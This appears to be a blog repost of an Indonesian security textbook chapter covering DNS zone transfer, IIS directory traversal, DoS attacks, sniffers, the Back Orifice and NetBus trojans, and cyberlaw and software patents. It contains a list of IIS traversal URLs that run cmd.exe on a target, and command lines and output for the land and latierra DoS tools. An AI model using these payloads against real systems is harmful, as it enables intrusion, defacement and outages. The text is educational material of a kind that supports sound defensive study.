keamanan cyber 4

Tampilkan postingan dengan label keamanan cyber 4. Tampilkan semua postingan
Tampilkan postingan dengan label keamanan cyber 4. Tampilkan semua postingan

Sabtu, 30 November 2024

keamanan cyber 4


 



query yang sedikit (berdasarkan jumlah dan ukuran paket yang

dikirimkan) dia menghasilkan jawaban yang cukup panjang. Dengan kata

lain terjadi amplifikasi dari penakai an bandwidth jaringan. Periksa sistem

anda apakah DNS anda sudah dikelola dengan baik atau masih terbuka

untuk zone transfer.

Sam Spade, utility untuk MS Windows

Untuk anda yang memakai  sistem yang berbasis Microsoft Windows,

anda dapat memakai  program Sam Spade. Program ini dapat diperoleh

secara gratis dari web http://www.samspade.org. Gambar berikut

menunjukkan sebuah sesi Sam Spade untuk mencari informasi tentang

domain INDOCISC.com.


 Cari informasi tentang nama-nama dari name server

(NS) domain anda atau domain perusahaan anda. Informasi

apa saja yang dapat anda peroleh dari data-data DNS

tersebut? Nomor IP apa saja yang dapat anda peroleh dari

data-data DNS tersebut?

Informasi DNS memang tersedia untuk umum. Akan tetapi seharusnya

informasi yang komplit hanya boleh dilihat oleh server tertentu. Istilahnya,

“zone transfer” hanya diperbolehkan untuk server tertentu saja.

Web server menyediakan jasa untuk publik. Dengan demikian dia harus

berada di depan publik. Sayangnya banyak lubang keamanan dalam

implementasi beberapa web server. Di bagian ini akan dicontohkan

beberapa eksploitasi tersebut.

Defacing Microsoft IIS

Salah satu lubang keamanan dari web yang berbasis IIS yaitu  adanya

program atau script yang kurang baik implementasinya. Sebagai contoh,

bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah

web server yang berbasis IIS. (Informasi lengkapnya ada di http://

www.securityfocus.com/bid/1806).

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/

c+dir

http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/

c+dir 

Perintah di atas menjalankan perintah “dir” untuk melihat direktori di server

IIS tersebut. Selain melihat direktori dengan perintah “dir”, anda dapat juga

menjalankan perintah lain di server tersebut, seperti misalnya meng-copy

file. Salah satu exploit yaitu  dengan mengambil file dari sebuah tempat

dengan “TFTP” ke server IIS tersebut. Prinsipnya yaitu  memakai 

perintah yang command line sebagai perintah “dir” tersebut, seperti dnegan

printah “tftp” dan menggantikan spasi dengan tanda tambah (+). Setelah itu,

file dapat ditempatkan dimana saja termasuk di direktori yang dipakai 

untuk memberikan layanan web. Atau dengan kata lain web tersebut dapat

diubah (deface).

 Denial of Service Attack

“Denial of Service (DoS) attack” merupakan sebuah usaha (dalam bentuk

serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem

tersebut tidak dapat menyediakan servis-servisnya (denial of service) atau

tingkat servis menurun dengan drastis. Cara untuk melumpuhkan dapat

bermacam-macam dan akibatnyapun dapat beragam. Sistem yang diserang

dapat menjadi “bengong” (hang, crash), tidak berfungsi, atau turun

kinerjanya (beban CPU tinggi).

Serangan denial of service berbeda dengan kejahatan pencurian data atau

kejahatan memonitor informasi yang lalu lalang. Dalam serangan DoS tidak

ada yang dicuri. Akan tetapi, serangan DoS dapat mengakibatkan kerugian

finansial. Sebagai contoh apabila sistem yang diserang merupakan server

yang menangani transaksi “commerce”, maka apabila server tersebut tidak

berfungsi, transaksi tidak dapat dilangsungkan. Bayangkan apabila sebuah

bank diserang oleh bank saingan dengan melumpuhkan outlet ATM

(Anjungan Tunai Mandiri, Automatic Teller Machine) yang dimiliki oleh

bank tersebut. Atau sebuah credit card merchant server yang diserang

sehingga tidak dapat menerima pembayaran melalui credit card.

Selain itu, serangan DoS sering dipakai  sebagai bagian dari serangan

lainnya. Misalnya, dalam serangan IPspoofing (seolah serangan datang dari

tempat lain dengan nomor IP milik orang lain), seringkali DoS dipakai 

untuk membungkam server yang akan dispoof.

Land attack

Land attack merupakan serangan kepada sistem dengan memakai 

program yang bernama “land”. Apabila serangan diarahkan kepada sistem

Windows 95, maka sistem yang tidak diproteksi akan menjadi hang (dan

bisa keluar layar biru). Demikian pula apabila serangan diarahkan ke

beberapa jenis UNIX versi lama, maka sistem akan hang. Jika serangan

diarahkan ke sistem Windows NT, maka sistem akan sibuk dengan

penakai an CPU mencapai 100% untuk beberapa saat sehingga sistem

terlihat seperti macet. Dapat dibayangkan apabila hal ini dilakukan secara

berulang-ulang. Serangan land ini membutuhkan nomor IP dan nomor port

dari server yang dituju. Untuk sistem Windows, biasanya port 139 yang

dipakai  untuk menyerang.

Program land menyerang server yang dituju dengan mengirimkan packet

palsu yang seolah-olah berasal dari server yang dituju. Dengan kata lain,

source dan destination dari packet dibuat seakan-akan berasal dari server

yang dituju. Akibatnya server yang diserang menjadi bingung.

unix# ./land 192.168.1.1 139

land.c by m3lt, FLC

192.168.1.1:139 landed

Latierra

Program latierra merupakan “perbaikan” dari program land, dimana port

yang dipakai  berubah-ubah sehingga menyulitkan bagi pengamanan.

latierra v1.0b by MondoMan (elmondo@usa.net), KeG

Enhanced version of land.c originally developed by m3lt, FLC

Arguments:

* -i dest_ip = destination ip address such as 1.1.1.1

If last octet is '-', then the address will increment

from 1 to 254 (Class C) on the next loop

and loop must be > 1 or -5 (forever).

Alternatives = zone=filename.txt or list=filename.txt

(ASCII) For list of alternative options,

use -a instead of -h.

* -b port# = beginning port number (required).

-e port# = ending port number (optional)

-t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a=ack,

u=urgent) 

-v = time_to_live value, default=255 

-p protocol = ~6=tcp, 17=udp, use -p option for complete list 

-w window_size = value from 0 to ?, default=65000 

-q tcp_sequence_number, default=3868

-m message_type

 (~0=none, 1=Out-Of-Band, 4=Msg_DontRoute

-s seconds = delay between port numbers, default=1 

-o 1 = supress additional output to screen, default=0

-l loop = times to loop through ports/scan, default=1,

-5=forever

* = required ~ = default parameter values

unix# ./latierra -i 192.167.1.1 -b 139 -e 141

latierra v1.0b by MondoMan (elmondo@usa.net), KeG

Enhanced version of land.c originally developed by m3lt, FLC

Settings:

 (-i) Dest. IP Addr : 192.168.1.1

 (-b) Beginning Port #: 139

 (-e) Ending Port # : 141

 (-s) Seconds to Pause: 1

 (-l) Loop : 1

 (-w) Window size : 65000

 (-q) Sequence Number : F1C (3868)

 (-v) Time-to-Live : 255

 (-p) IP Protocol # : 6

 (-t) TCP flags : syn push

Done.

Ping-o-death

Ping-o-death sebetulnya yaitu  eksploitasi program ping dengan

memberikan packet yang ukurannya besar ke sistem yang dituju. Beberapa

sistem UNIX ternyata menjadi hang ketika diserang dengan cara ini.

Program ping umum terdapat di berbagai operating system, meskipun

umumnya program ping tersebut mengirimkan packet dengan ukuran kecil

(tertentu) dan tidak memiliki fasilitas untuk mengubah besarnya packet.

Salah satu implementasi program ping yang dapat dipakai  untuk

mengubah ukuran packet yaitu  program ping yang ada di sistem Windows

95.

Ping broadcast (smurf)

Salah satu mekanisme serangan yang baru-baru ini mulai marak dipakai 

yaitu  memakai  ping ke alamat broadcast, ini yang sering disebut

dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast

tersebut akan menjawab. Apakah ini merupakan standar?

Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast

ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon

dari device-device tersebut. Akibatnya jaringan menjadi lambat.

$ ping 192.168.1.255

PING 192.168.1.255 (192.168.1.255): 56 data bytes

64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms

64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms 

(DUP!)

64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms

64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms 

(DUP!)

64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms

64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms 

(DUP!)

64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms

64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms 

(DUP!)

--- 192.168.1.255 ping statistics ---

4 packets transmitted, 4 packets received, +4 duplicates, 0% 

packet loss

round-trip min/avg/max = 2.5/6.0/24.0 ms

Smurf attack biasanya dilakukan dengan memakai  IP spoofing, yaitu

mengubah nomor IP dari datangnya request, tidak seperti contoh di atas.

Dengan memakai  IP spoofing, respon dari ping tadi dialamatkan ke

komputer yang IPnya dispoof. Akibatnya komputer tersebut akan menerima

banyak paket. Hal ini dapat mengakibatkan pemborosan penakai an

(bandwidth) jaringan yang menghubungkan komputer tersebut. Dapat

dibayangkan apabila komputer yang dispoof tersebut memiliki hubungan

yang berkecepatan rendah dan ping diarahkan ke sistem yang memiliki

banyak host. Hal ini dapat mengakibatkan DoS attack.

Contoh-contoh DoS attack lainnya

• Program “ping.exe” di sistem Windows (dicobakan pada Windows NT 4

Service Pack 4) dapat dipakai  untuk menghentikan beberapa aplikasi

sistem Windows jika diberikan nama host yang panjangnya lebih dari

112 karakter. Aplikasi dialup akan mati. Eksploitasi ini membutuhkan

user di local server.

http://www.securitytracker.com/alerts/2001/Apr/1001255.htm


• A vulnerability has been reported in the version of Telnet that is shipped

with most Microsoft systems that allows a local user to crash several

applications, including OutlookExpress. 

It is reported that, if you fill up the "Host Name" buffer (Connect/Remote

System/Host Name) with the maximum of 256 chars and press "Con￾nect" (tested with 256 "A" characters), the application will crash but will

not close down, instead, it will display a "Connection Failed!" message.

http://www.securitytracker.com/alerts/2001/Mar/1001209.html

Sniffer

Program sniffer yaitu  program yang dapat dipakai  untuk menyadap

data dan informasi melalui jaringan komputer. Di tangan seorang admin,

program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di

jaringan atau untuk memantau adanya serangan. Di tangan cracker, program

sniffer dapat dipakai  untuk menyadap password (jika dikirimkan dalam

bentuk clear text).

Sniffit

Program sniffit dijalankan dengan userid root (atau program dapat di-setuid

root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data.

Untuk contoh penakai an sniffit, silahkan baca dokumentasi yang

menyertainya. (Versi berikut dari buku ini akan menyediakan informasi

tentang penakai annya.)

tcpdump

Program tcpdump merupakan program gratis yang umum dipakai  untuk

menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga

tersedia dengan nama windump. Setelah ditangkap, data-data (paket) ini

dapat diolah dengan program lainnya, seperti dengan memakai 

program tcpshow, tcptrace, dan sejenisnya.

Program tcpdump sangat powerful dan dipakai  sebagai basis dari

pembahasan di beberapa buku, seperti buku seri “TCP/IP Illustrated” dari

Richard Stevens [46] yang sangat terkenal atau buku “Network Intrusion

Detection” [31]. Berikut ini yaitu  contoh sebuah sesi tcpdump.

unix# tcpdump

06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: S 

616175183:616175183(0) win 5840 <mss 1460,nop,nop,sackOK> (DF)

06:46:31.318893 192.168.1.1.80 > 192.168.1.7.1043: S 

1312015909:1312015909(0) ack 616175184 win 32736 <mss 1460>

06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: . ack 1 win 

5840 (DF)

06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: P 

1:296(295) ack 1 win 5840 (DF)

06:46:31.338893 192.168.1.1.80 > 192.168.1.7.1043: . ack 296 

win 32441 (DF)

06:46:31.738893 192.168.1.1.80 > 192.168.1.7.1043: P 

1:200(199) ack 296 win 32736 (DF)

06:46:31.868893 192.168.1.7.1043 > 192.168.1.1.80: . ack 200 

win 5641 (DF)

06:46:31.898893 192.168.1.1.1492 > 192.168.1.7.113: S 

2035772989:2035772989(0) win 512 <mss 1460>

06:46:31.898893 192.168.1.7.113 > 192.168.1.1.1492: R 0:0(0) 

ack 2035772990 win 0

06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp: echo request

06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply

06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp: echo request

06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply

06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp: echo request

06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply

06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp: echo request

06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp: echo reply

06:46:44.048893 192.168.1.7.1043 > 192.168.1.1.80: P 

296:591(295) ack 200 win 5641 (DF)

06:46:44.048893 192.168.1.1.80 > 192.168.1.7.1043: P 

200:398(198) ack 591 win 32736 (DF)

06:46:44.168893 192.168.1.7.1043 > 192.168.1.1.80: . ack 398

win 5443 (DF)

Dalam contoh di atas, pada baris-baris pertama, ditunjukkan sebuah sesi

web browsing (lihat port 80 yang dipakai  sebagai target port) dari sebuah

komputer dengan nomor IP 192.168.1.7 ke server web dengan nomor IP

192.168.1.1. Di sesi itu nampak three way handshaking (paket SYN, dibalas

dengan SYN/ACK, dan dibalas dengan ACK). Untuk mengetahui lebih

lengkap tentang paket-paket ini, silahkan baca buku “TCP/IP Illustrated”

dari Richard Stevens atau buku “Network Intrusion Detection” (Stephen

Northcutt & Judy Novak).

Selain sesi web, nampak juga sesi ping dimana ada paket “ICMP echo

request” yang dibalas dengan paket “ICMP echo reply”. Ping ini juga

dikirimkan dari IP 192.168.1.7 ke komputer dengan IP 192.168.1.1.

Sniffer Pro

Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem

Windows. Program ini dibuat oleh Network Associates dan cukup lengkap

fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan

(rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat

menarik dan membantu administrator.

Anti Sniffer

Untuk menutup lubang keamanan dari kegiatan sniffing, administrator

dapat membuat jaringannya bersegmen dan memakai  perangkat switch

sebagai pengganti hub biasa. Selain itu dapat juga dipakai  program untuk

mendeteksi adanya penakai an sniffer di jaringan yang dikelolanya.

Program pendeteksi sniffer ini disebut anti-sniffer.

Program anti-sniffer bekerja dengan mengirimkan packet palsu ke dalam

jaringan dan mendeteksi responnya. Ethernetcard yang diset ke dalam

promiscuous mode (yang umumnya dipakai  ketika melakukan sniffing)

dan program yang dipakai  untuk menyadap sering memberikan jawaban

atas packet palsu ini. Dengan adanya jawaban tersebut dapat diketahui

bahwa ada yang melakukan kegiatan sniffing.

Trojan Horse

Trojan horse di sistem komputer yaitu  program yang disisipkan tanpa

pengetahuan si pemilik komputer. Trojan horse ini kemudian dapat

diaktifkan dan dikendalikan dari jarak jauh, atau dengan memakai


timer (pewaktu). Akibatnya, komputer yang disisipi trojan horse tersebut

dapat dikendalikan dari jarak jauh.

Ada yang mengatakan bahwa sebetulnya program ini mirip remote

administration. Memang sifat dan fungsinya sama. Remote administration /

access program seperti pcAnywhere dipakai  untuk keperluan yang benar

(legitimate). Sementara trojan horse biasanya dipakai  untuk keperluan

yang negatif.

Back Orifice (BO)

Back Orifice (BO) merupakan trojan horse untuk sistem yang memakai 

operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari

Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat

populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah

keluar BO 2000 untuk sistem operasi Windows 2000.

BO terdiri dari server (yang dipasang atau disisipkan di komputer target)

dan client (yang dipakai  untuk mengendalikan server). Akses ke server

BO dapat diproteksi dengan memakai  password sehingga

mengecohkan atau membatasi akses oleh orang lain.

Dengan memakai  BO, intruder dapat mengirimkan pesan seperti:

Mengirim pesan mungkin tidak terlalu bermasalah, meskipun menggangu.

Bayangkan jika intruder tersebut memformat harddisk anda atau

menangkan keystroke anda (apalagi kalau anda menuliskan userid dan

password).

Server BO memakai  TCP/IP dan menunggu di port 31337. Jika di

komputer anda port tersebut terbuka, ada kemungkinan BO sudah terpasang

di sana. Namun, nomor port dari BO dapat dipindahkan ke nomor port lain

sehingga mengelabui administrator.

Mendeteksi BO

Gunakan program "REGEDIT" dan cari

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\

RunServices

Jika variabel tersebut berisi, maka anda sudah terkena BO. Catatan: nama

file yaitu  space-dot-exe. Cek di direktory "Windows\SYSTEM\" jika ada

nama file yang kosong atau titik, dan ukurannya (sama dengan atau lebih

besar dari) 122KB, kemungkinan itu BO. File tersebut tidak dapat dihapus

begitu saja.

Sumber informasi tentang BO dapat diperoleh dari

• http://www.nwi.net/~pchelp/bo/bo.html

• http://www.bo2k.com

• http://www.iss.net/xforce/alerts/advise5.html

NetBus

NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat

dipakai  untuk mengelola komputer Windows 95/98/NT dari jarak jauh

untuk mengakses data dan fungsi dari komputer tersebut. NetBus terdiri

dari client dan server. Versi 1.60 dari NetBus server yaitu  Windows PE file

yang bernama PATCH.EXE. Jika dia terpasang (installed) maka dia akan

langsung dijalankan ketika komputer di"StartUp".

Eksekusi dari server ada di 

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\

Run

Porsi dari server NetBus cukup canggih dimana dia menghilangkan

jejaknya dari daftar proses yang jalan, dan tidak memperbolehkan dirinya

dihapus atau di"rename". Jika server tersebut dijalankan dengan

memakai  "/remove", maka dia akan menghilangkan diri (remove) dari

sistem itu. Porsi client dipakai  untuk mengendalikan komputer yang

sudah terpasang NetBus. Komunikasi dilakukan dengan memakai 

TCP/IP. Client dapat melakukan port scanning untuk mencari dimana server

berada. NetBus dapat mengirimkan "keystroke" seolah-olah user yang

mengetikkannya di depan layar, dan juga dapat menangkap "keystroke"

serta menyimpannya dalam sebuah berkas.

Pengamanan terhadap serangan NetBus dapat dilakukan dengan

memakai  program Busjacker dan F-Secure. Informasi mengenai

NetBus dapat diperoleh di http://www.netbus.org.

 Masalah keamanan erat hubungannya dengan masalah hukum. Terminologi

cyberlaw mulai banyak terdengar. Dalam bab ini akan diulas beberapa

aspek keamanan yang berhubungan dengan masalah hukum. 

[Bagian ini akan saya perbaiki lagi mengingat sudah banyak informasi

mengenai cyberlaw di Indonesia. Saya sendiri ikut terlibat dalam

penyusunan cyberlaw ini.]

Internet menghilangkan batas tempat dan waktu, dua asas yang cukup

esensial di bidang hukum. Dimanakah batas teritori dari cyberlaw? Untuk

siapakah cyberlaw dibuat? Biasanya hukum menyangkut citizen dari

yuridiksi hukum tersebut. Cyberlaw biasanya terkait dengan Netizen. Untuk

Indonesia, siapakah netizen Indonesia?

Terhubungnya sebuah sistem informasi dengan Internet membuka peluang

adanya kejahatan melalui jaringan komputer. Hal ini menimbulkan

tantangan bagi penegak hukum. Hukum dari sebagian besar negara di dunia

belum menjangkau daerah cyberspace. Saat ini hampir semua negara di

dunia berlomba-lomba untuk menyiapkan landasan hukum bagi Internet.

Tentunya banyak hal yang dapat dibahas, akan tetapi dalam buku ini hanya

dibahas hal-hal yang berkaitan dengan masalah keamanan (security),

masalah lain seperti pajak (hal-hal yang berhubungan dengan perbankan

dan bisnis), trademark, HaKI (Intellectual Property Rights atau IPR), dan

yang tidak langsung terkait dengan masalah keamanan tidak dibahas di

dalam buku ini.

Dalam aplikasi e-commerce, misalnya, ada masalah yang berkaitan dengan

hukum yaitu masalah privacy dan penakai an teknologi kriptografi (seperti

penakai an enkripsi). Setiap negara memiliki hukum yang berlainan.

Misalnya negara Amerika Serikat melarang ekspor teknologi enkripsi.

Demikian pula pengamanan data-data yang berhubungan dengan bidang

kesehatan sangat diperhatikan. Selain itu sistem perbankan setiap negara

memiliki hukum yang berlainan. Hal-hal inilah yang menyulitkan

commerce yang melewati batas fisik negara.

Penegakan hukum (law enforcement) merupakan masalah tersendiri. Ambil

contoh seseorang yang tertangkap basah melakukan cracking yang

mengakibatkan kerugian finansial. Hukuman apa yang dapat diberikan?

Sebagai contoh, di Cina terjadi hukuman mati atas dua orang crackers yang

tertangkap mencuri uang sebesar US$31.400 dari sebuah bank di Cina

bagian Timur. Berita lengkapnya dapat dibaca di:

• http://www.news.com/News/Item/0,4,30332,00.html

• http://cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/

index.html

• http://slashdot.org/articles/98/12/28/096231.shtml

Bagaimana dengan di Indonesia?

Hukum di Luar Negeri

Beberapa hukum yang terkait dengan masalah komputer, jaringan

komputer, dan sistem informasi di luar negeri antara lain:

• Di Amerika Serikat ada “Computer Fraud and Abuse Act” (1984) dan

kemudian diperbaiki di tahun 1994.

• Di Inggris ada “Computer Misuse Act of 1990”.

Bagian ini masih harus ditambahkan lebih banyak lagi.

penakai an Enkripsi dan Teknologi 

Kriptografi Secara Umum

Salah satu cara untuk mengamankan data dan informasi yaitu  dengan

memakai  teknologi kriptografi (cryptography). Misalnya data dapat

dienkripsi dengan memakai  metoda tertentu sehingga hanya dapat

dibaca oleh orang tertentu. Ada beberapa masalah dalam penakai an

teknologi kriptografi ini, antara lain:

• Dilarangnya ekspor teknologi kriptografi dari Amerika Serikat (USA),

padahal teknologi yang canggih ini banyak dikembangkan di Amerika

Serikat. Alasan pelarangan ini disebabkan ketakutan pemerintah

Amerika Serikat tidak dapat membaca (menyadap) komunikasi mafia,

teroris, dan musuh negara Amerika. Itulah sebabnya produk teknologi

kriptografi dianggap sebagai munition, yang dibatasi penjualan ke luar

negerinya. Adanya larangan ini membuat interoperability antar produk

yang memakai  teknologi kriptografi menjadi lebih sulit.

Hal yang lain yaitu  selain negara Amerika, negara lain mendapat

produk dengan kualitas keamanan yang lebih rendah. Sebagai contoh,

Web browser Netscape dilengkapi dengan fasilitas security dengan

memakai  sistem RSA. Pada saat buku ini ditulis, implementasi RSA

dengan memakai  128 bit hanya dapat dipakai  di dalam negeri

Amerika saja (tidak boleh diekspor). Untuk itu Netscape harus membuat

versi Internasional yang hanya memakai  56 bit dan boleh diekspor.

Tingkat keamanan sistem yang memakai  56 bit jauh lebih rendah

dibandingkan dengan sistem yang memakai  128 bit. Contoh lain

yaitu  mekanisme authentication (MSCHAP) produk Microsoft

Windows NT 4.0 memakai  enkripsi 40-bit untuk versi internasional

dan 128-bit untuk produk US-only. Saat ini, 40-bit dianggap kurang

cukup untuk melindungi kerahasiaan data. Akibatnya banyak orang yang

membeli produk security dari negara lain, bukan dari Amerika Serikat.

(Hal ini sebenarnya merugikan perusahaan di Amerika Serikat.)

• Bagi sebuah negara, ketergantungan masalah keamanan kepada negara

lain merupakan suatu aspek yang cukup sensitif. Kemampuan negara

dalam mengusai teknologi merupakan suatu hal yang esensial.

Bagaimana jika kedua negara berperang?

• Ketergantungan kepada negara lain ini juga sangat penting dilihat dari

sudut bisnis karena misalnya jika electronic commerce memakai 

produk yang harus dilisensi dari negara lain maka banyak devisa negara

yang akan tersedot hanya untuk melisensi teknologi tersebut.

• Algoritma-algoritma yang sangat baik untuk kriptografi umumnya

dipatenkan. Hal ini seringkali mempersulit implementasi sebuah produk

tanpa melanggar hak patent. Selain itu setiap negara di dunia memiliki

pandangan tertentu terhadap hak patent. Sebagi contoh, algoritma RSA

dipatenkan di Amerika Serikat akan tetapi tidak diakui di Jepang (lihat

cerita latar belakangnya di [17]).

Pemerintah negara tertentu berusaha untuk memakai  peraturan

(regulation) untuk mengatur penakai an teknologi enkripsi. Hal ini

ditentang dan diragukan oleh banyak pihak. Dalam sebuah survey [22],

82% responden menyatakan bahwa pemerintah tidak dapat mengatur secara

efektif penyebaran penakai an teknologi enkripsi melalui regulasi.

Digital Evidence - Barang Bukti Digital

Salah satu persoalan yang ditimbulkan oleh teknologi digital yaitu 

kemudahan untuk mengubah data. Sebuah dokumen elektronik dapat

dengan mudah diubah dengan memakai  sebuah wordprocessor

sehingga dokumen tampak seperti sama. Di dunia analog yang

konvensional, jika kita mengubah isi sebuah dokumen (misalnya dengan

menghapus atau menimpanya dengan tulisan lain) maka akan kelihatan

perubahan tersebut. Hal ini menyebabkan orang bingung dengan barang

bukti digital.

Apakah dokumen elektronik bisa dijadikan bukti? Jika kita ambil dokumen

hasil wordprocessor, yang mana yang disebut asli? Dokumen dalam bentuk

kertas yang dicetak? Dokumen yang berada di harddisk? Dokumen yang

berada di CD? Dokumen yang saat ini berada di memory komputer? 

Pertanyaan-pertanyaan tersebut di atas ini terjadi karena kita memakai 

konsep berpikir konvensional. Pada konsep lama, konsep (dokumen) asli itu

hanya ada satu buah. Sementara itu dalam konsep digital, dokumen asli bisa

lebih dari satu buah. Kesemua dokumen itu asli.

Keaslian sebuah dokumen tidak ditentukan oleh jumlahnya, akan tetapi oleh

keaslian isinya. Dalam dunia digital, hal ini dapat dilakukan dengan

memakai  digital signature atau tanda tangan digital. Digital signature

merupakan sebuah konsep untuk memastikan bahwa isi dokumen tidak

berubah. Aspek yang ingin dipertahankan yaitu  aspek “non-repudiation”

(tidak dapat menyangkal). Aspek ini dapat dipenuhi dengan adanya digital

signature. Bahkan dengan konsep digital signature, dokumen yang dicetak

(atau bahkan difotocopy atau di-fax-kan) yaitu  dokumen yang tidak asli.

Masalah yang berhubungan dengan patent

Enkripsi dengan memakai  kunci publik sangat membantu dalam

meningkatkan keamanan informasi. Salah satu algoritma yang cukup

populer dipakai  yaitu  RSA. Algoritma ini dipatenkan di Amerika

Serikat dengan nomor U.S. Patent 4,405,829 yang dikeluarkan pada tanggal

20 Agustus 1983. Paten yang dimiliki oleh Public Key Partners (PKP,

Sunnyvale, California) ini akan habis di tahun 2000. RSA tidak dipatenkan

di luar daerah Amerika Utara. Bagaimana dengan penakai an algoritma

RSA ini di Indonesia? penakai an enkripsi di luar Amerika ini merupakan

sebuah topik diskusi yang cukup seru.

Secara umum paten di bidang teknologi harus dipertimbangkan dengan

matang. Pasalnya, pada kenyataannya paten lebih banyak berpihak kepada

perusahaan besar. Untuk mendaftarkan paten membutuhkan biaya yang

cukup besar. Jika paten ini dilanggar, pemilik paten yang tidak memiliki

uang harus berjuang keras untuk melawan perusahaan besar yang

melanggar paten tersebut. Hanya perusahaan besar saja yang sanggup

mempertahankan paten.

Paten juga dapat menghambat pengembangan produk. Bayangkan, untuk

membuat sebuah printer dibutuhkan lebih dari 1000 paten. Bagaimana

perusahan kecil di Indonesia bisa berkompetisi dengan perusahaan besar di

luar negeri?

Paten dapat membuat harga produk menjadi lebih mahal. Contoh kasus

yaitu  paten obat HIV/AIDS. Penduduk miskin dari Afrika dan India tidak

dapat membeli obat yang mahal harganya. Pada mulanya tidak ada obat

generik untuk penyakit ini karena masalah paten tersebut. Untuk kasus ini,

Pemerintah Afrika Selatan menerapkan “compulsury license” sehingga

perusahaan lokal dapat memproduksi obat tersebut dengan harga yang lebih

terjangkau.

Paten Software

“Computer programs are as abstracts as any algorithm can be.”

(Prof. Donald Knuth)

Salah satu topik yang baru mendapat perhatian yaitu  paten software

(software patent). Pada awalnya, software dilindungi dengan copyright.

Namun saat ini Amerika mempelopori penerapan paten untuk software.

Apanya yang dipatenkan dalam software? Algoritmanya.

Masalahnya, algoritma yang dipatenkan mulai “aneh”. Maksudnya hal-hal

yang sederhana dipatenkan sehingga menyulitkan inovasi. Bayangkan,

untuk membuat program sederhana mungkin seorang programmer harus

melisensi berbagai paten. Belum apa-apa sudah ada biaya yang harus

dikeluarkan. Contoh paten yang dapat menghambat inovasi:

• Algoritma Lempel-Ziv (LZW) banyak dipakai  untuk compression

gambar. Sebagai contoh, algoritma yang dipakai  untuk menyimpan

gambar dalam format GIF memakai  algoritma LZW ini. Jadi, ketika

anda membuat sebuah program untuk memperagakan GIF, maka anda

harus membayar royalty kepada pemilik algoritma LZW ini. Saat buku

ini ditulis, Unisys yaitu  pemilik paten LZW ini. Itulah sebabnya saat ini

banyak situs web atau program gambar yang memakai  format PNG.

• One click e-commerce. Jika anda membuat sebuah situs web yang

melakukan transaksi, misalnya pembeli memilih barang kemudian

memasukkannya dalam “shopping cart”, dan kemudian membayarnya,

maka ada kemungkinan anda melanggar paten (US patent 5,960,411,

“Method and system for placing a purchase order via a communications

network”) yang didaftarkan oleh Amazon ini. Implementasi hal seperti

itu dengan cookie merupakan hal yang sangat mudah (trivial) dan sudah

dilakukan oleh orang banyak.

• Pada tahun 1980-an perusahaan XyQuest membuat produk pengolah

kata dengan nama XyWrite. Produk itu sangat populer pada kurun waktu

itu. Namun pada suatu saat, perusahaan itu harus menarik fitur

“automatic correction and abbreviation expansion” dari produk XyWrite

karena dianggap melanggar paten yang dimiliki oleh perusahaan lain.

Akibatnya penakai  software XyWrite tidak dapat memakai  fitur

tersebut. Jika anda berpikir untuk memasukkan fitur tersebut dalam

program pengolah kata yang anda buat, siap-siap membayar royalty atau

dituntut.

Di Amerika, meski paten ini berlaku, banyak orang yang tidak setuju. Pakar

komputer Donald Knuth1

 bahkan melayangkan surat ke Kantor Paten

Amerika agar paten software ini dicabut karena akan banyak orang Amerika

yang pindah ke luar negeri untuk menghindari paten ini. Thomas Jefferson,

bahkan mengatakan bahwa “ide tidak dapat dipatenkan”.

Di Eropa, saat buku ini ditulis, masih terjadi perdebatan seru akan paten

software ini. Untuk sementara ini, mereka masih tetap menolak penerapan

paten dalam software.

Untuk Indonesia, saya berharap agar paten software tidak terjadi. Regim

copyright sudah cukup untuk software. Jika kita juga ikut menerapkan paten

software, saya khawatir hal ini akan menjadi hambatan tambahan bagi

pengembang software di Indonesia (dan dunia pada umumnya).

Privacy

Aspek privacy sering menjadi masalah yang berkaitan dengan masalah

keamanan. Pemakai (user) umumnya ingin informasi dan kegiatan yang

dilakukannya tidak diketahui oleh orang lain, termasuk oleh administrator.

